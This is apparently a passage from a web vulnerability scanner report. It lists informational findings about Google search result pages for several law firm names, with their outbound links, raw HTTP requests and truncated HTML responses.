<h3 class="r"><a href="http://www.lawyers.com/Wisconsin/Madison/Axley-Brynelson,-LLP-1793563-f.html" class=l onmousedown="return clk(this.href,'','','','6','','0CEIQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:x_s7oVmlWC4J:www.lawyers.com/Wisconsin/Madison/Axley-Brynelson,-LLP-1793563-f.html+Axley+Brynelson&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEkQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/pages/Axley-Brynelson-LLP/100335213355063" class=l onmousedown="return clk(this.href,'','','','7','','0CEsQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:q3RymXkTLwIJ:www.facebook.com/pages/Axley-Brynelson-LLP/100335213355063+Axley+Brynelson&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/AxleyLawFirm" class=l onmousedown="return clk(this.href,'','','','8','','0CFEQFjAH')"><em>
...[SNIP]...
<span style="padding-bottom:1px"><a href="http://twitter.com/AxleyLawFirm" class=l onmousedown="return clk(this.href,'','','','9','','0CFQQigwwCA')" style="border-bottom:0"><img src="http://t1.gstatic.com/images?q=tbn:ANd9GcTsGFm0VxfWYfu7a2wqMbDfTJWfvlUnGUQPvOmWGcz4g6aY9w" alt="" align=middle border=0 height=44 style=";padding:1px 1px;vertical-align:middle" width=44></a>
...[SNIP]...
<div><a style="color:#4272db;text-decoration:none" href="http://twitter.com/AxleyLawFirm" class=l onmousedown="return clk(this.href,'','','','9','','0CFMQoAQwCA')">AxleyLawFirm</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:y2e7CDn4HM0J:twitter.com/AxleyLawFirm+Axley+Brynelson&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFwQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wenportal.org/Resources/Oneononeassistance/BusinessAssistanceProgram/AxleyBrynelsonLLP.htm" class=l onmousedown="return clk(this.href,'','','','10','','0CF8QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:dEN4MAibkhIJ:www.wenportal.org/Resources/Oneononeassistance/BusinessAssistanceProgram/AxleyBrynelsonLLP.htm+Axley+Brynelson&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGcQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/axley-brynelson-llp" class=l onmousedown="return clk(this.href,'','','','11','','0CGgQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:5VrC-trogTMJ:www.linkedin.com/company/axley-brynelson-llp+Axley+Brynelson&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CG0QIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yelp.com/biz/axley-brynelson-law-firm-madison" class=l onmousedown="return clk(this.href,'','','','12','','0CG8QFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:W7Frg8Z3jvMJ:www.yelp.com/biz/axley-brynelson-law-firm-madison+Axley+Brynelson&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CHcQIDAL')">Cached</a>
...[SNIP]...

19.48. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Diserio+Martin+O%27Connor+%26+Castiglioni&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://pview.findlaw.com/cmd/view?wld_id=1629220&pid=1
http://stamford-ct.lawinfo.com/
http://webcache.googleusercontent.com/search?q=cache:-clXcyP5dswJ:pview.findlaw.com/cmd/view%3Fwld_id%3D1629220%26pid%3D1+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:3qU_gAtpAA4J:www.martindale.com/Diserio-Martin-OConnor-Castiglioni/law-firm-265489.htm+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:AX2oLhHhl-4J:www.dmoc.com/+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BLF2Ik-KvwsJ:www.linkedin.com/company/diserio-martin-o%27connor-%26-castiglioni+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:I8TAZCt2FD8J:www.elawmarketing.com/portfolio/flash-animation/diserio-martin-oconnor-castiglioni-flash-holiday-card+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ULoY1-RX8x4J:www.dmoc.com/contact+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:VjClvH9dFCwJ:www.superlawyers.com/connecticut/lawfirm/Diserio-Martin-OConnor-and-Castiglioni-LLP/8d61fc59-a3f2-47ed-a5a7-b6e044df09a8.html+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ceIqGucG0jsJ:www.dmoc.com/attorneys+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:owqVrb8uFTwJ:www.lawyercasting.com/2011/01/client-diserio-martin-oconnor-castiglioni-llp-launches-new-website.html+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.dmoc.com/
http://www.dmoc.com/attorneys
http://www.dmoc.com/contact
http://www.dmoc.com/news
http://www.dmoc.com/practice/litigation
http://www.dmoc.com/publications/congress-finally-addresses-estate-tax
http://www.dmoc.com/publications/connecticut-new-home-warranties-act
http://www.elawmarketing.com/portfolio/flash-animation/diserio-martin-oconnor-castiglioni-flash-holiday-card
http://www.lawyercasting.com/2011/01/client-diserio-martin-oconnor-castiglioni-llp-launches-new-website.html
http://www.lawyers.com/Connecticut/Stamford/Diserio-Martin-O-Connor-and-Castiglioni-LLP-335325-f.html
http://www.linkedin.com/company/diserio-martin-o'connor-&-castiglioni
http://www.martindale.com/Diserio-Martin-OConnor-Castiglioni/law-firm-265489.htm
http://www.seaboardproperties.com/
http://www.superlawyers.com/connecticut/lawfirm/Diserio-Martin-OConnor-and-Castiglioni-LLP/8d61fc59-a3f2-47ed-a5a7-b6e044df09a8.html
http://www.wilsonrms.com/
http://www.youtube.com/results?q=Diserio+Martin+O%27Connor+%26+Castiglioni&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1
http://www.znclaw.com/

Request

GET /search?q=Diserio+Martin+O%27Connor+%26+Castiglioni&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:16:38 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76008

<!doctype html> <head> <title>Diserio Martin O'Connor & Castiglioni - Google Search</title> <script>window.google={kEI:"ps_LTd3kBqy40QHMpYn7Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Diserio+Martin+O%27Connor+%26+Castiglioni&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dmoc.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AX2oLhHhl-4J:www.dmoc.com/+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:AX2oLhHhl-4J:www.dmoc.com/+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/attorneys" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.dmoc.com/contact" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/practice/litigation" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Litigation</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/news" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoAzAA')">News & Events</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/publications/congress-finally-addresses-estate-tax" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoBDAA')">Congress Finally Addresses the ...</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/publications/connecticut-new-home-warranties-act" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoBTAA')">Connecticut New Home Warranties Act</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dmoc.com/attorneys" class=l onmousedown="return clk(this.href,'','','','3','','0CCwQFjAC')">Attorneys | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ceIqGucG0jsJ:www.dmoc.com/attorneys+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ceIqGucG0jsJ:www.dmoc.com/attorneys+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDEQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dmoc.com/contact" class=l onmousedown="return clk(this.href,'','','','4','','0CDIQFjAD')">Contact Us | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ULoY1-RX8x4J:www.dmoc.com/contact+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ULoY1-RX8x4J:www.dmoc.com/contact+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDcQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pview.findlaw.com/cmd/view?wld_id=1629220&pid=1" class=l onmousedown="return clk(this.href,'','','','5','','0CDkQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-clXcyP5dswJ:pview.findlaw.com/cmd/view%3Fwld_id%3D1629220%26pid%3D1+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:-clXcyP5dswJ:pview.findlaw.com/cmd/view%3Fwld_id%3D1629220%26pid%3D1+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CD4QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyercasting.com/2011/01/client-diserio-martin-oconnor-castiglioni-llp-launches-new-website.html" class=l onmousedown="return clk(this.href,'','','','6','','0CEEQFjAF')">Client <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:owqVrb8uFTwJ:www.lawyercasting.com/2011/01/client-diserio-martin-oconnor-castiglioni-llp-launches-new-website.html+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:owqVrb8uFTwJ:www.lawyercasting.com/2011/01/client-diserio-martin-oconnor-castiglioni-llp-launches-new-website.html+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEYQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/diserio-martin-o%27connor-&-castiglioni" class=l onmousedown="return clk('http://www.linkedin.com/company/diserio-martin-o%27connor-&-castiglioni','','','','7','','0CEcQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BLF2Ik-KvwsJ:www.linkedin.com/company/diserio-martin-o%27connor-%26-castiglioni+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:BLF2Ik-KvwsJ:www.linkedin.com/company/diserio-martin-o%27connor-%26-castiglioni+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CEwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Diserio-Martin-OConnor-Castiglioni/law-firm-265489.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CE0QFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:3qU_gAtpAA4J:www.martindale.com/Diserio-Martin-OConnor-Castiglioni/law-firm-265489.htm+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:3qU_gAtpAA4J:www.martindale.com/Diserio-Martin-OConnor-Castiglioni/law-firm-265489.htm+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CFIQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elawmarketing.com/portfolio/flash-animation/diserio-martin-oconnor-castiglioni-flash-holiday-card" class=l onmousedown="return clk(this.href,'','','','9','','0CFMQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:I8TAZCt2FD8J:www.elawmarketing.com/portfolio/flash-animation/diserio-martin-oconnor-castiglioni-flash-holiday-card+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:I8TAZCt2FD8J:www.elawmarketing.com/portfolio/flash-animation/diserio-martin-oconnor-castiglioni-flash-holiday-card+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFgQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/connecticut/lawfirm/Diserio-Martin-OConnor-and-Castiglioni-LLP/8d61fc59-a3f2-47ed-a5a7-b6e044df09a8.html" class=l onmousedown="return clk(this.href,'','','','10','','0CFkQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:VjClvH9dFCwJ:www.superlawyers.com/connecticut/lawfirm/Diserio-Martin-OConnor-and-Castiglioni-LLP/8d61fc59-a3f2-47ed-a5a7-b6e044df09a8.html+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:VjClvH9dFCwJ:www.superlawyers.com/connecticut/lawfirm/Diserio-Martin-OConnor-and-Castiglioni-LLP/8d61fc59-a3f2-47ed-a5a7-b6e044df09a8.html+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CF4QIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Connecticut/Stamford/Diserio-Martin-O-Connor-and-Castiglioni-LLP-335325-f.html" class=l onmousedown="return clk(this.href,'','','','11','','0CF8QFjAK')"><em>
...[SNIP]...
<div><a href="http://www.wilsonrms.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGcQoggwCw')">Wilson RMS</a>
...[SNIP]...
<div><a href="http://www.seaboardproperties.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CGkQoggwDA')">Seaboard</a>
...[SNIP]...
<div><a href="http://www.znclaw.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CGsQoggwDQ')">znclaw</a>
...[SNIP]...
<div><a href="http://stamford-ct.lawinfo.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CG0QoggwDg')">Stamford Lawyer Directory</a>
...[SNIP]...

19.49. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Fried+Kane+Walters+Zuschlag+Grochmal&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://pittsburgh.attorneydirectorydb.org/attorneys/fried-kane-walters-zuschlag-grochmal
http://pittsburghdirectory.examiner.com/fried+kane+walters+zuschlag+and+grochmal.9.16420815p.home.html
http://webcache.googleusercontent.com/search?q=cache:0M70R66xG5IJ:pittsburghdirectory.examiner.com/fried%2Bkane%2Bwalters%2Bzuschlag%2Band%2Bgrochmal.9.16420815p.home.html+Fried+Kane+Walters+Zuschlag+Grochmal&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:2oSim0EuE6sJ:www.superlawyers.com/pennsylvania/lawfirm/Fried-Kane-Walters-Zuschlag-and-Grochmal/20fbe13d-a54b-43d2-952f-9422c9a65c37.html+Fried+Kane+Walters+Zuschlag+Grochmal&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:FwRjJ78tES8J:www.friedkanelaw.com/+Fried+Kane+Walters+Zuschlag+Grochmal&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:QphxVRFOp5cJ:www.law.pitt.edu/career/directories/smallfirms/fried-kane-walters-zuschlag-grochmal+Fried+Kane+Walters+Zuschlag+Grochmal&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:a2Yv2HW6nOsJ:www.friedkanelaw.com/Attorneys/jam_main.htm+Fried+Kane+Walters+Zuschlag+Grochmal&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:dMxVwFuLV5IJ:www.yellowpages.com/pittsburgh-pa/mip/fried-kane-walters-zuschlag-grochmal-28209975+Fried+Kane+Walters+Zuschlag+Grochmal&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:eJlOzFghDWoJ:pittsburgh.attorneydirectorydb.org/attorneys/fried-kane-walters-zuschlag-grochmal+Fried+Kane+Walters+Zuschlag+Grochmal&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:igpudMiUJPIJ:www.friedkanelaw.com/Second/history_main.htm+Fried+Kane+Walters+Zuschlag+Grochmal&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:mAK-4icWzX0J:www.friedkanelaw.com/Attorneys/mds_main.htm+Fried+Kane+Walters+Zuschlag+Grochmal&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:tyq4wIaSHmMJ:www.lawyers.com/Pennsylvania/Pittsburgh/Fried,-Kane,-Walters,-Zuschlag-and-Grochmal-1555509-f.html+Fried+Kane+Walters+Zuschlag+Grochmal&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.friedkanelaw.com/
http://www.friedkanelaw.com/Attorneys/jam_main.htm
http://www.friedkanelaw.com/Attorneys/mds_main.htm
http://www.friedkanelaw.com/Second/history_main.htm
http://www.law.pitt.edu/career/directories/smallfirms/fried-kane-walters-zuschlag-grochmal
http://www.lawyers.com/Pennsylvania/Pittsburgh/Fried,-Kane,-Walters,-Zuschlag-and-Grochmal-1555509-f.html
http://www.superlawyers.com/pennsylvania/lawfirm/Fried-Kane-Walters-Zuschlag-and-Grochmal/20fbe13d-a54b-43d2-952f-9422c9a65c37.html
http://www.yellowpages.com/pittsburgh-pa/mip/fried-kane-walters-zuschlag-grochmal-28209975
http://www.youtube.com/results?q=Fried+Kane+Walters+Zuschlag+Grochmal&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Fried+Kane+Walters+Zuschlag+Grochmal&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:24 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 68431

<!doctype html> <head> <title>Fried Kane Walters Zuschlag Grochmal - Google Search</title> <script>window.google={kEI:"iNDLTezxNqfZ0QGR1dT8Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Fried+Kane+Walters+Zuschlag+Grochmal&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.friedkanelaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')">FKWZ&G Home</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FwRjJ78tES8J:www.friedkanelaw.com/+Fried+Kane+Walters+Zuschlag+Grochmal&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.friedkanelaw.com/Second/history_main.htm" class=l onmousedown="return clk(this.href,'','','','2','','0CB0QFjAB')">FKWZ&G History</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:igpudMiUJPIJ:www.friedkanelaw.com/Second/history_main.htm+Fried+Kane+Walters+Zuschlag+Grochmal&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.friedkanelaw.com/Attorneys/jam_main.htm" class=l onmousedown="return clk(this.href,'','','','3','','0CCQQFjAC')">James A. Mazzotta</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:a2Yv2HW6nOsJ:www.friedkanelaw.com/Attorneys/jam_main.htm+Fried+Kane+Walters+Zuschlag+Grochmal&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCkQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.friedkanelaw.com/Attorneys/mds_main.htm" class=l onmousedown="return clk(this.href,'','','','4','','0CCoQFjAD')">Michael D. Sherman</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mAK-4icWzX0J:www.friedkanelaw.com/Attorneys/mds_main.htm+Fried+Kane+Walters+Zuschlag+Grochmal&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CC8QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yellowpages.com/pittsburgh-pa/mip/fried-kane-walters-zuschlag-grochmal-28209975" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:dMxVwFuLV5IJ:www.yellowpages.com/pittsburgh-pa/mip/fried-kane-walters-zuschlag-grochmal-28209975+Fried+Kane+Walters+Zuschlag+Grochmal&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.law.pitt.edu/career/directories/smallfirms/fried-kane-walters-zuschlag-grochmal" class=l onmousedown="return clk(this.href,'','','','6','','0CDgQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QphxVRFOp5cJ:www.law.pitt.edu/career/directories/smallfirms/fried-kane-walters-zuschlag-grochmal+Fried+Kane+Walters+Zuschlag+Grochmal&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CD0QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Pennsylvania/Pittsburgh/Fried,-Kane,-Walters,-Zuschlag-and-Grochmal-1555509-f.html" class=l onmousedown="return clk(this.href,'','','','7','','0CD4QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tyq4wIaSHmMJ:www.lawyers.com/Pennsylvania/Pittsburgh/Fried,-Kane,-Walters,-Zuschlag-and-Grochmal-1555509-f.html+Fried+Kane+Walters+Zuschlag+Grochmal&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEUQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pittsburghdirectory.examiner.com/fried+kane+walters+zuschlag+and+grochmal.9.16420815p.home.html" class=l onmousedown="return clk(this.href,'','','','8','','0CEYQFjAH')"><em>
...[SNIP]...
